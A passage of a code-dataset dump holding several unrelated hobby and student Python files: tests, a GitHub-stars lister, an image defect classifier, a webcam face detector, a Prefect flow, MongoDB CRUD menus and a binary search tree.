\"\"\"\n r = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(r.to_dictionary(), { \"id\": 18, \"width\": 8, \"height\": 6,\n \"x\": 4, \"y\": 2})\n\n def test_create(self):\n \"\"\"\n Test create\n \"\"\"\n r = Rectangle.create(**{\"id\": 18, \"width\": 8, \"height\": 6,\n \"x\": 4, 
\"y\": 2})\n res = Rectangle(8, 6, 4, 2, 18)\n self.assertEqual(str(r), str(res))\n\n r = Rectangle.create(**{\"id\": 18, \"width\": 8, \"height\": 6})\n res = Rectangle(8, 6, 0, 0, 18)\n self.assertEqual(str(r), str(res))\n\n r = Rectangle.create(**{\"id\": 18, \"width\": 8,\n \"height\": 6, \"x\": 4})\n res = Rectangle(8, 6, 4, 0, 18)\n self.assertEqual(str(r), str(res))\n\n\n def test_save_to_file(self):\n \"\"\"\n Test save file\n \"\"\"\n r = Rectangle(2, 4, 0, 0, 18)\n Rectangle.save_to_file([r])\n with open(\"Rectangle.json\", \"r\") as f:\n data_read = f.read()\n expect_output = '[{\"id\": 18, \"width\": 2, \"height\": 4, \"x\": 0, \"y\": 0}]'\n self.assertEqual(data_read, expect_output)\n os.remove(\"Rectangle.json\")\n\n Rectangle.save_to_file([])\n with open(\"Rectangle.json\", \"r\") as f:\n data_read = f.read()\n expect_output = '[]'\n self.assertEqual(data_read, expect_output)\n os.remove(\"Rectangle.json\")\n\n Rectangle.save_to_file(None)\n with open(\"Rectangle.json\", \"r\") as f:\n data_read = f.read()\n expect_output = '[]'\n self.assertEqual(data_read, expect_output)\n os.remove(\"Rectangle.json\")\n\n def test_load_from_file(self):\n \"\"\"\n Test load file\n \"\"\"\n r1 = Rectangle(4, 6)\n Rectangle.save_to_file([r1])\n rectangles = Rectangle.load_from_file()\n self.assertIsInstance(rectangles[0], Rectangle)\n self.assertEqual(rectangles[0].width, 4)\n self.assertEqual(rectangles[0].height, 6)\n os.remove(\"Rectangle.json\")\n\n r = Rectangle.load_from_file()\n self.assertTrue(isinstance(r, list))\n self.assertEqual(r, [])\n","repo_name":"CllaudiaB/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/tests/test_models/test_rectangle.py","file_name":"test_rectangle.py","file_ext":"py","file_size_in_byte":5909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"20686941157","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom datetime import datetime\nfrom string import Template\n\nimport httpx\n\nHEADERS = {\n \"Accept\": \"application/vnd.github.v3+json\",\n \"Authorization\": f\"token {os.getenv('GITHUB_TOKEN')}\",\n}\n\n\ntpl = Template(\n \"\"\"# Awesome Stars\n\n \n\n## Table of Contents\n\n$toc\n$contents\n\"\"\"\n)\n\n\ndef get_all_stars():\n \"\"\"\n Get all stars from GitHub API\n \"\"\"\n # https://docs.github.com/cn/rest/activity/starring\n # url = \"https://api.github.com/user/starred\"\n url = f\"https://api.github.com/users/{os.getenv('USERNAME')}/starred\"\n params = {\"per_page\": 100}\n\n res = httpx.get(url, params=params, headers=HEADERS)\n print(f\"Total pages: {res.links['last']['url']}\\n\", file=sys.stderr)\n\n stars = []\n while \"next\" in res.links.keys():\n url = res.links[\"next\"][\"url\"]\n print(\n f\"> Getting: {url}, X-RateLimit-Used: {res.headers['X-RateLimit-Used']}\",\n file=sys.stderr,\n )\n res = httpx.get(url, params=params, headers=HEADERS)\n stars.extend(res.json())\n\n return stars\n\n\ndef get_repos_by_language(stars):\n \"\"\"\n Group repos by language\n \"\"\"\n repos_by_language = {}\n for s in stars:\n language = s[\"language\"] or \"Others\"\n description = s[\"description\"]\n description = description.replace(\"\\n\", \"\").strip() if description else \"\"\n\n if language not in repos_by_language:\n repos_by_language[language] = []\n\n repos_by_language[language].append(\n [\n s[\"full_name\"],\n s[\"html_url\"],\n s[\"stargazers_count\"],\n description,\n ]\n )\n\n repos_by_language = dict(\n sorted(repos_by_language.items(), key=lambda item: item[0])\n )\n return repos_by_language\n\n\ndef make_md(repos_by_language):\n \"\"\"\n Make markdown\n \"\"\"\n toc = \"\"\n for language in repos_by_language.keys():\n toc += f\"- [{language}](#{'-'.join(language.lower().split())})\\n\"\n\n contents = \"\"\n for language, repos in repos_by_language.items():\n contents += f\"## {language}\\n\\n\"\n for repo in repos:\n contents += \"- [{}]({}) - `★{}` {}\\n\".format(*repo)\n contents += \"\\n\"\n\n md = tpl.substitute(\n total=len(stars),\n updated=datetime.now().strftime(\"%Y--%m--%d\"),\n toc=toc,\n contents=contents,\n ).strip()\n\n return md\n\n\nif __name__ == \"__main__\":\n stars = get_all_stars()\n repos_by_language = get_repos_by_language(stars)\n md = make_md(repos_by_language)\n print(md)\n","repo_name":"sunlei/awesome-stars","sub_path":"starred.py","file_name":"starred.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"20609224372","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 24 17:45:03 2022\n\n@author: arun\n\"\"\"\nimport argparse\nimport numpy as np\nfrom cv2 import imread, resize\nfrom sklearn import preprocessing\nimport os\nimport pickle\nimport math\nfrom cv2 import imshow, waitKey, destroyAllWindows, filter2D, imread, resize\nfrom theano.tensor.signal import pool\nfrom theano import tensor as T\nfrom theano import function\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\n#%%\ndef imageMaxPool(img):\n\n my_dmatrix = T.TensorType('uint8', (False,)*2)\n input = my_dmatrix('input')\n maxpool_shape = (30, 40)\n pool_out = pool.pool_2d(input, maxpool_shape, ignore_border=True)\n f = function([input],pool_out)\n\n #invals = numpy.random.RandomState(1).rand(3, 2, 5, 5)\n invals = img\n output = f(invals)\n return output\n\n\ndef showPicture(img):\n imshow('image',img)\n print(\"Showing Picture\")\n waitKey(0)\n destroyAllWindows()\n\n\ndef centeredFilter(N):\n mask_shell = np.empty((N, N), dtype=np.object)\n num = N//2\n y = num\n x = -1 * num\n countX = 0\n countY = 0\n\n for j in mask_shell: # interate over rows\n for i in j: # interate over elements\n mask_shell[countX][countY] = [x,y]\n x = x + 1\n countY = countY + 1\n y = y - 1\n x = -1 * num\n countY = 0\n countX = countX + 1\n\n return mask_shell\n\n\ndef steerableGaussian(img, theta, kernel_size):\n G2A_array = np.empty((kernel_size, kernel_size))\n G2B_array = np.empty((kernel_size, kernel_size))\n G2C_array = np.empty((kernel_size, kernel_size))\n countX = 0\n countY = 0\n # Calculate G2A - in array not normalized\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n G2A = 0.9213*(2*(XY[0]*XY[0])-1)*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n G2A_array[countX][countY] = G2A\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n\n G2A_array = (math.cos(theta)*math.cos(theta))*G2A_array\n\n R2A = filter2D(img, -1, G2A_array)\n\n # Reset index variables\n countX = 0\n countY = 0\n # Calculate G2B - in array not normalized\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n G2B = 1.843*(XY[0]*XY[1])*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n G2B_array[countX][countY] = G2B\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n G2B_array = (-2*math.cos(theta)*math.sin(theta))*G2B_array\n\n R2B = filter2D(img, -1, G2B_array)\n\n # Reset index variables\n countX = 0\n countY = 0\n # Calculate G2A - in array not normalized\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n G2C = 0.9213*(2*(XY[1]*XY[1])-1)*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n G2C_array[countX][countY] = G2C\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n G2C_array = (math.sin(theta)*math.sin(theta))*G2C_array\n R2C = filter2D(img, -1, G2C_array)\n addAB = np.add(R2A,R2B)\n F_theta = np.add(R2C,addAB)\n\n # showPicture(F_theta)\n\n return F_theta\n\n\ndef steerableHilbert(img,theta,kernel_size):\n\n H2A_array = np.empty((kernel_size,kernel_size))\n H2B_array = np.empty((kernel_size,kernel_size))\n H2C_array = np.empty((kernel_size,kernel_size))\n H2D_array = np.empty((kernel_size,kernel_size))\n\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2A = 0.9780*((-2.254*XY[0])+(XY[0]*XY[0]*XY[0]))*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2A_array[countX][countY] = H2A\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n\n H2A_array = (math.cos(theta)*math.cos(theta)*math.cos(theta))*H2A_array\n 
R2A = filter2D(img, -1, H2A_array)\n # R2A_LC = (math.cos(theta)*math.cos(theta))*R2A\n\n #showPicture(R2A)\n\n # Reset index variables\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2B = 0.9780*(-0.7515+(XY[0]*XY[0]))*XY[1]*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2B_array[countX][countY] = H2B\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n # print(H2B_array)\n\n H2B_array = (-3*math.cos(theta)*math.cos(theta)*math.sin(theta))*H2B_array\n\n R2B = filter2D(img, -1, H2B_array)\n\n #showPicture(R2B)\n\n # Reset index variables\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2C = 0.9780*(-0.7515+(XY[1]*XY[1]))*XY[0]*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2C_array[countX][countY] = H2C\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n H2C_array = (3*math.cos(theta)*math.sin(theta)*math.sin(theta))*H2C_array\n\n R2C = filter2D(img, -1, H2C_array)\n # Reset index variables\n countX = 0\n countY = 0\n\n for rows in centeredFilter(kernel_size):\n for XY in rows:\n H2D = 0.9780*((-2.254*XY[1])+(XY[1]*XY[1]*XY[1]))*math.exp(-1*((XY[0]*XY[0])+(XY[1]*XY[1])))\n H2D_array[countX][countY] = H2D\n countY = countY + 1\n countY = 0\n countX = countX + 1\n\n H2D_array = (-1*math.sin(theta)*math.sin(theta)*math.sin(theta))*H2D_array\n R2D = filter2D(img, -1, H2D_array)\n addAB = np.add(R2A, R2B)\n addABC = np.add(R2C, addAB)\n F_theta = np.add(R2D, addABC)\n\n # showPicture(F_theta)\n\n return F_theta\n\n#%%\n\nif __name__ == '__main__':\n # file_name = \"/home/arun/Documents/PyWSPrecision/Defect_Classification-main/Dataset/test/test_mould_2.jpg\"\n \n Datadir=os.path.join(os.getcwd(),'TestData')\n \n files = os.listdir(Datadir)\n \n file_index=np.random.choice(len(files))\n \n file_name=files[file_index]\n \n file_name=os.path.join(Datadir,file_name)\n \n kernel_size = 5\n theta_list = [0, 45, 90, 135, 180, 225, 270, 315]\n\n class_labels = np.load(\"defect_class_labels.npy\")\n dataset = np.load(\"defect_dataset.npy\")\n dataset_14400 = np.load(\"defect_dataset_14400.npy\")\n # classes_name = pickle.load(\"defect_classes.pkl\")\n with open(\"defect_classes.pkl\", 'rb') as file:\n classes_name = pickle.load(file)\n \n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image\", help=\"path to image to classify\")\n args = parser.parse_args()\n\n if args.image:\n file_name = args.image\n\n img = imread(file_name, 0)\n img = resize(img, (1200, 900))\n feature_maps = []\n for theta in theta_list:\n feature_maps.append(steerableGaussian(img, theta, kernel_size))\n feature_maps.append(steerableHilbert(img, theta, kernel_size))\n\n lda_input = np.array([], dtype=np.uint8)\n for feature_map in feature_maps:\n pooled = imageMaxPool(feature_map)\n lda_input = np.append(lda_input,pooled)\n\n lda_input = np.resize(lda_input,(1, 14400))\n\n lda = LinearDiscriminantAnalysis(n_components=1)\n reduced = lda.fit(dataset_14400, class_labels).transform(lda_input)\n print(reduced)\n\n scaler = preprocessing.StandardScaler().fit(dataset)\n scaler.transform(reduced)\n\n with open(\"svm_class_model.pkl\", 'rb') as file:\n clf = pickle.load(file)\n \n score=clf.predict(reduced)\n class_predict=classes_name[int(score)]\n print('Predicted Class index: %s Class Name: 
%s'%(score,class_predict))\n","repo_name":"duraiarun-p/SurveyTek","sub_path":"Defect_SVM/Defect_Classifier.py","file_name":"Defect_Classifier.py","file_ext":"py","file_size_in_byte":7452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
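Two details in the classifier record above are worth flagging: scaler.transform(reduced) returns a new array that is immediately discarded (transform does not modify its argument in place), and dtype=np.object in centeredFilter was removed in NumPy 1.24 in favor of the builtin object. A minimal sketch of the intended fixes; whether dataset is the right reference for fitting the scaler is left as in the original:

# In centeredFilter:
mask_shell = np.empty((N, N), dtype=object)  # np.object no longer exists

# In the __main__ block:
scaler = preprocessing.StandardScaler().fit(dataset)
reduced = scaler.transform(reduced)  # assign the result; it is not in-place
score = clf.predict(reduced)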
+{"seq_id":"25507921571","text":"from typing import List\n\n\ndef remove_duplicates(nums: List[int]) -> int:\n dct = {}\n i = len(nums)\n if i == 0:\n return 0\n while i > 0:\n if nums[i - 1] in dct:\n nums.remove(nums[i - 1])\n i -= 1\n continue\n dct[nums[i - 1]] = \"\"\n i -= 1\n return len(nums)\n\n\nprint(remove_duplicates([1,1,2,3,4,4,4,4]))","repo_name":"yunior123/solving_leetcode_python","sub_path":"remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35430075186","text":"from article.models import Tag, Category, BigCategory,Article,Banner\r\n\r\n\r\n# 全局变量\r\ndef all_template(request):\r\n tags = Tag.objects.all()\r\n nodes = BigCategory.objects.all()\r\n view_articles = Article.objects.all().order_by('-views')[:5]\r\n banners = Banner.objects.all()\r\n love_articles = Article.objects.all().order_by('-loves')[:3]\r\n # for node in nodes:\r\n # node.category_set.\r\n context = {'nodes': nodes, 'tags': tags,'view_articles': view_articles, 'love_articles': love_articles,'banners': banners}\r\n return context\r\n","repo_name":"LuGebuhuixiao/bloglu","sub_path":"lublog/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71403513187","text":"import cv2\nfrom threading import Thread \n\nclass PiWebcam(Thread):\n\tdef __init__(self, facemodel=\"haarcascade_frontalface_default.xml\"):\n\t\tThread.__init__(self)\n\t\tself._cam = cv2.VideoCapture(0)\n\t\tself._cam.set(3,100)\n\t\tself._cam.set(4,100)\n\t\tself._image = None\n\t\tself._ret = None\n\t\tself._stopCam = False\n\t\tself._cam_window = None\n\t\tself.face_c = cv2.CascadeClassifier(facemodel)\n\n\t\tself._facerec = None\n\n\t\t\n\tdef cam_window(self):\n\t\tif self._cam_window is None:\n\t\t\tself._cam_window = cv2.namedWindow(\"camera\", \n\t\t\t\t\t\t\t\t\t\t cv2.WINDOW_AUTOSIZE)\n\t\tif self._image is not None:\n\n\t\t\tif self._facerec is not None:\n\t\t\t\tfor (x,y,w,h) in self._facerec:\t\n\t\t\t\t\tcv2.rectangle(self._image,(x,y),(x+w,y+h),(244,0,0),2)\n\n\t\t\tcv2.imshow(\"camera\", self._image)\n\n\t\t#Tecla esc para sair\n\t\tif cv2.waitKey(1) == 27:\n\t\t\tcv2.destroyAllWindows()\n\t\t\tself.start_stop()\n\t\t\t\n\tdef face_detection(self):\n\t\tgray = self.get_gray()\t\t\n\t\tself._facerec = self.face_c.detectMultiScale(gray, 1.3,5)\n\n\tdef run(self):\n\t\twhile True:\t\t\n\t\t\tself.cam_window()\t\t\t\n\t\t\tself._ret, self._image = self._cam.read()\n\t\t\t\n\t\t\tif self._stopCam is True:\n\t\t\t\tbreak\n\t\t\t\t\n\tdef is_running(self):\n\t\treturn not self._stopCam\n\t\t\t\t\n\tdef start_stop(self):\n\t\tself._stopCam = True if self._stopCam is False else False\n\t\t\n\tdef get_image(self):\n\t\treturn self._image\n\t\t\n\tdef get_gray(self):\n\t\tif self._image is not None:\n\t\t\treturn cv2.cvtColor(self._image,cv2.COLOR_BGR2GRAY)\n\t\t\t\n\t\t\n\tdef set_image(self, image):\n\t\tself._image = image\n\n\nif __name__ == \"__main__\":\n\tmycam = PiWebcam()\n\tmycam.setDaemon(True)\n\tmycam.start()\n\n\twhile True:\n\t\timg = mycam.get_image()\n\t\tif img is not None:\n\t\t\tmycam.face_detection()\n\n\t\tif mycam.is_running() is False:\n\t\t\tbreak","repo_name":"duducosmos/piwebcam","sub_path":"piwebcam.py","file_name":"piwebcam.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"4449183786","text":"from scipy.io.wavfile import write\nfrom src.backend.audio_tracks.audio_track import AudioTrack\nfrom src.backend.audio_tracks.audio_constants import sample_rate\nimport numpy as np\n\nclass AudioSaver(object):\n def __init__(self):\n print(\"AudioSaver created!\")\n\n def save_wav_file(self, audio_track: AudioTrack, filename: str) -> bool:\n print(\"AudioSaver: save_wav_file\")\n # Intentar guardar el track de audio como .wav\n # Si salio bien, devolver True, sino, devolver False\n try:\n max = np.amax(np.abs(audio_track.content))\n #if max > (2**15)-1:\n if max != 0:\n audio_track.content = np.multiply(audio_track.content, ((2**15)-1)/max)\n write(filename, sample_rate, np.int16(audio_track.content))#.astype(np.int16))\n except:\n print(\"ERROR!!! AudioSaver coudn't save wav file!!!\")\n return False\n\n return True\n","repo_name":"AlexStephan/ASSD_TP2","sub_path":"src/backend/saver/audio_saver.py","file_name":"audio_saver.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43863139104","text":"# -*- coding: utf-8 -*-\n\n\ndef gcd(a,b):\n while b>0:\n a,b = b,a%b\n return a\n\ndef f(n,k,al):\n if k==1:\n return n*(n-1)//2\n\n kl = []\n r = 1\n while r*r<=k:\n if k%r==0:\n kl.append(r)\n kl.append(k//r)\n r += 1\n kl = list(set(kl))\n kl.sort()\n # print(kl)\n d = {}\n for a in al:\n x = gcd(a,k)\n if x not in d:\n d[x] = 0\n d[x] += 1\n # print(d)\n res = 0\n for i in range(len(kl)):\n for j in range(i,len(kl)):\n k1 = kl[i]\n k2 = kl[j]\n if gcd(k1*k2,k)!=k:\n continue\n if k1 in d and k2 in d:\n # print(k1,k2)\n if k1!=k2:\n res += d[k1]*d[k2]\n else:\n res += d[k1]*(d[k1]-1)//2\n\n return res\n\ndef f2(n,k,al):\n from itertools import combinations\n res = 0\n for p in combinations(al,2):\n if p[0]*p[1]%k==0:\n res += 1\n return res\n\nif __name__ == '__main__':\n n,k = map(int, input().split())\n al = list(map(int, input().split()))\n print(f(n,k,al))\n # print(\"f2\",f2(n,k,al))\n\n # from random import randint\n # n = 10\n #\n # for _ in range(100):\n # k = randint(1,100)\n # al = [randint(1,30) for _ in range(n)]\n #\n # a1 = f(n,k,al)\n # a2 = f2(n,k,al)\n # if a1!=a2:\n # print(a1,a2)\n # print(n,k,al)\n","repo_name":"takushi-m/atcoder-work","sub_path":"work/ddcc_2016_qual_c.py","file_name":"ddcc_2016_qual_c.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70845333346","text":"# Registers a flow that takes different gcs parquet files, and creates a single dataset, where each parquet file is a table.\n\nfrom prefect import Flow, unmapped, Parameter\nfrom prefect.run_configs import LocalRun\nfrom prefect.storage import GCS\nfrom prefect.executors import DaskExecutor\n\nfrom nl_open_data.config import config as CONFIG\nimport nl_open_data.tasks as nlt\n\nwith Flow(\"gcs_to_bq\") as gcs_to_bq_flow:\n \"\"\"A flow to create a BQ dataset from a list of GCS uris to parquet files.\n\n This flows takes in a list of GS uris, assumes that each uri points at a parquet file,\n and creates a new BQ dataset, where each uri is an external table in the dataset.\n \n uris : list[str]\n List of GS uris to parquet files\n dataset_name : str\n The dataset name to use when creating in BQ\n config : Config object\n Config object holding GCP and local paths.\n gcp_env : str\n Determines which GCP environment to use from config.gcp\n prod_env : str\n If gcp_env = \"prod\", determines which GCP environemnt to use from config.gcp.prod\n description : str\n The dataset description to use when creating in BQ\n \"\"\"\n uris = Parameter(\"uris\")\n dataset_name = Parameter(\"dataset_name\")\n config = Parameter(\"config\", default=CONFIG)\n gcp_env = Parameter(\"gcp_env\", default=\"dev\")\n prod_env = Parameter(\"prod_env\", default=None)\n description = Parameter(\"description\", default=\"\")\n\n nlt.create_linked_dataset(\n dataset_name=unmapped(dataset_name),\n gcs_uris=unmapped(uris),\n config=unmapped(config),\n gcp_env=unmapped(gcp_env),\n prod_env=unmapped(prod_env),\n description=unmapped(description),\n )\n\nif __name__ == \"__main__\":\n\n # Register flow\n gcs_to_bq_flow.storage = GCS(\n project=CONFIG.gcp.dev.project_id, bucket=f\"{CONFIG.gcp.dev.bucket}-prefect\",\n )\n gcs_to_bq_flow.run_config = LocalRun(labels=[\"nl-open-data-vm-1\"])\n gcs_to_bq_flow.executor = DaskExecutor()\n flow_id = gcs_to_bq_flow.register(\n project_name=\"nl_open_data\", version_group_id=\"gcs_to_bq\"\n )\n\n # # Run locally\n # URIS = [\n # \"gs://dataverbinders-dev/cbs/kwb/kwb_2013.parquet\",\n # \"gs://dataverbinders-dev/cbs/kwb/kerncijfers_wijken_en_buurten_2014.parquet\",\n # ]\n # DATASET_NAME = \"CBS_KWB_TEST\"\n # DATASET_DESCRIPTION = \"MY DESCRIPTION TEXT\"\n\n # params = {\n # \"uris\": URIS,\n # \"dataset_name\": DATASET_NAME,\n # \"description\": DATASET_DESCRIPTION,\n # }\n # state = gcs_to_bq_flow.run(parameters=params)\n","repo_name":"dataverbinders/nl-open-data","sub_path":"nl_open_data/flows/register/register_gcs_to_bq.py","file_name":"register_gcs_to_bq.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72836969827","text":"from pymongo import MongoClient\nfrom compras import create_compra, read_compras\nfrom config import URI\nfrom favoritos import menu_favoritos\n\nclient = MongoClient(URI)\ndb = client.mercado_livre\nmycol = db.usuario\n\n\ndef create_usuario():\n mycol = db.usuario\n print(\"\\nInserir novo usuário\")\n nome = input(\"Nome: \")\n sobrenome = input(\"Sobrenome: \")\n cpf = input(\"CPF: \")\n data_nascimento = input(\"Data de nascimento: \")\n key = 'S'\n end = []\n while (key != 'N'):\n rua = input(\"Rua: \")\n num = input(\"Número: \")\n bairro = input(\"Bairro: \")\n cidade = input(\"Cidade: \")\n estado = input(\"Estado: \")\n cep = input(\"CEP: \")\n endereco = {\n \"rua\": rua,\n \"num\": num,\n \"bairro\": bairro,\n \"cidade\": cidade,\n \"estado\": estado,\n \"cep\": cep\n }\n end.append(endereco)\n key = input(\"Deseja cadastrar um novo endereço (S/N)? \")\n mydoc = {\n \"nome\": nome, \n \"sobrenome\": sobrenome,\n \"data de nascimento\": data_nascimento, \n \"cpf\": cpf, \n \"endereco\": end\n }\n x = mycol.insert_one(mydoc)\n print(\"Usuário cadastrado com ID:\", x.inserted_id)\n\ndef read_usuario():\n cpf = input(\"Digite o CPF do usuário: \")\n\n user_query = {\"cpf\": cpf}\n mydoc = mycol.find(user_query)\n\n usuarios_encontrados = list(mydoc)\n\n if not usuarios_encontrados:\n print(\"Usuário não encontrado.\")\n else:\n for user in usuarios_encontrados:\n print(\"Dados do usuário: \", user)\n\ndef update_usuario(cpf):\n mycol = db.usuario\n myquery = {\"cpf\": cpf}\n mydoc = mycol.find_one(myquery)\n if mydoc:\n print(\"Dados do usuário:\")\n print(\"Nome:\", mydoc.get(\"nome\", \"\"))\n print(\"Sobrenome:\", mydoc.get(\"sobrenome\", \"\"))\n print(\"CPF:\", mydoc.get(\"cpf\", \"\"))\n print(\"Data de Nascimento:\", mydoc.get(\"data de nascimento\", \"\"))\n endereco = mydoc.get(\"endereco\", {})\n\n if isinstance(endereco, dict):\n print(\"Endereço:\")\n print(\" Rua:\", endereco.get(\"rua\", \"\"))\n print(\" Número:\", endereco.get(\"num\", \"\"))\n print(\" Bairro:\", endereco.get(\"bairro\", \"\"))\n print(\" Cidade:\", endereco.get(\"cidade\", \"\"))\n print(\" Estado:\", endereco.get(\"estado\", \"\"))\n print(\" CEP:\", endereco.get(\"cep\", \"\"))\n elif isinstance(endereco, list):\n print(\"Endereços:\")\n for addr in endereco:\n print(\" Rua:\", addr.get(\"rua\", \"\"))\n print(\" Número:\", addr.get(\"num\", \"\"))\n print(\" Bairro:\", addr.get(\"bairro\", \"\"))\n print(\" Cidade:\", addr.get(\"cidade\", \"\"))\n print(\" Estado:\", addr.get(\"estado\", \"\"))\n print(\" CEP:\", addr.get(\"cep\", \"\"))\n\n\n nome = input(\"Mudar nome: \")\n if len(nome):\n mydoc[\"nome\"] = nome\n\n sobrenome = input(\"Mudar sobrenome: \")\n if len(sobrenome):\n mydoc[\"sobrenome\"] = sobrenome\n\n data_nascimento = input(\"Mudar data de nascimento: \")\n if len(data_nascimento):\n mydoc[\"data de nascimento\"] = data_nascimento\n\n update_endereco = input(\"Atualizar endereço (S/N)? 
\").upper()\n if update_endereco == 'S':\n endereco = {}\n rua = input(\"Rua: \")\n num = input(\"Número: \")\n bairro = input(\"Bairro: \")\n cidade = input(\"Cidade: \")\n estado = input(\"Estado: \")\n cep = input(\"CEP: \")\n endereco = {\n \"rua\": rua,\n \"num\": num,\n \"bairro\": bairro,\n \"cidade\": cidade,\n \"estado\": estado,\n \"cep\": cep\n }\n mydoc[\"endereco\"] = endereco\n\n newvalues = {\"$set\": mydoc}\n mycol.update_one(myquery, newvalues)\n print(\"Usuário atualizado com sucesso\")\n else:\n print(\"Nenhum usuário encontrado para o CPF especificado\")\n\ndef delete_usuario(cpf):\n mycol = db.usuario\n myquery = {\"cpf\": cpf}\n mydoc = mycol.delete_one(myquery)\n if mydoc.deleted_count > 0:\n print(\"Usuário deletado com sucesso\")\n else:\n print(\"Nenhum usuário encontrado para o CPF especificado\")\n\ndef menu_usuario():\n while True:\n print(\"\\n\\033[1mMenu Usuário:\\033[0m\")\n print(\"1 - Criar Usuário\")\n print(\"2 - Ler Usuário\")\n print(\"3 - Atualizar Usuário\")\n print(\"4 - Deletar Usuário\")\n print(\"\\033[1mC - Menu Compras\\033[0m\")\n print(\"\\033[1mF - Menu Favoritos\\033[0m\")\n print(\"V - Voltar\")\n\n sub = input(\"Digite a opção desejada: \").upper()\n\n if sub == 'V':\n break\n\n if sub == '1':\n print(\"Criar Usuário\")\n create_usuario()\n\n elif sub == '2':\n read_usuario()\n\n elif sub == '3':\n nome = input(\"Atualizar usuário, qual o CPF? \")\n update_usuario(nome)\n\n elif sub == '4':\n print(\"Deletar Usuário\")\n cpf = input(\"CPF a ser deletado: \")\n delete_usuario(cpf)\n \n elif sub == 'C':\n while True:\n print(\"\\n\\033[1mMenu Compras:\\033[0m\")\n print(\"1 - Criar Compra\")\n print(\"2 - Ler Compras\")\n print(\"V - Voltar\")\n\n sub_compras = input(\"Digite a opção desejada: \").upper()\n\n if sub_compras == 'V':\n break\n\n if sub_compras == '1':\n cpf = input(\"Digite o CPF do usuário: \")\n create_compra(cpf)\n\n elif sub_compras == '2':\n cpf = input(\"Digite o CPF do usuário para listar as compras: \")\n read_compras(cpf)\n\n elif sub == 'F':\n cpf = input(\"Digite o CPF do usuário: \")\n menu_favoritos(cpf)\n\n \n","repo_name":"gabidsbarbosa/nosql","sub_path":"mongodb/usuario.py","file_name":"usuario.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21465924880","text":"class TreeNode:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n\ndefaultNode = TreeNode(0)\nclass BST:\n def __init__(self, data):\n self.root = TreeNode(data)\n\n def contains(self, data, node=defaultNode):\n if (node == defaultNode):\n node = self.root\n if (node == None):\n return False\n if (node.data == data):\n return True\n if (data < node.data):\n return self.contains(data, node.left)\n else:\n return self.contains(data, node.right)\n\n def DFS(self, data, node=defaultNode):\n #check both left tree and right tree recursively then return true if either is true\n if (node == defaultNode):\n node = self.root\n\n if (node == None):\n return\n leftval = self.DFS(data, node.left)\n if (data == node.data):\n return True\n rightval = self.DFS(data, node.right)\n return leftval or rightval #need to do return the OR of this.\n\n def BFS(self, data):\n stack = [self.root]\n while (len(stack) > 0):\n node = stack.pop()\n if (node is None):\n continue\n if (node.data == data):\n return True\n stack.append(node.right)\n stack.append(node.left)\n return False\n\n\n def insert(self, data, node=defaultNode):\n if (node == defaultNode):\n node = self.root\n if (node == None):\n return TreeNode(data)\n if (data < node.data):\n node.left = self.insert(data, node.left)\n elif (data > node.data):\n node.right = self.insert(data, node.right)\n else:\n pass # do nothing on duplicate keys\n return node\n\n def inorder(self, node):\n if node is None:\n return\n self.inorder(node.left) #see how we do the operation THEN print.\n print(node.data, end=' ')\n self.inorder(node.right)\n\n def postorder(self, node):\n if node is None:\n return\n self.postorder(node.left)\n self.postorder(node.right)\n print(node.data, end=' ')\n\n def preorder(self, node):\n if node is None:\n return\n print(node.data, end=' ')\n self.preorder(node.left)\n self.preorder(node.right)\n\n\nif __name__ == \"__main__\":\n test = BST(4)\n test.insert(2)\n test.insert(1)\n test.insert(3)\n test.insert(6)\n test.insert(5)\n test.insert(7)\n test.inorder(test.root)\n print()\n print(test.contains(4))\n 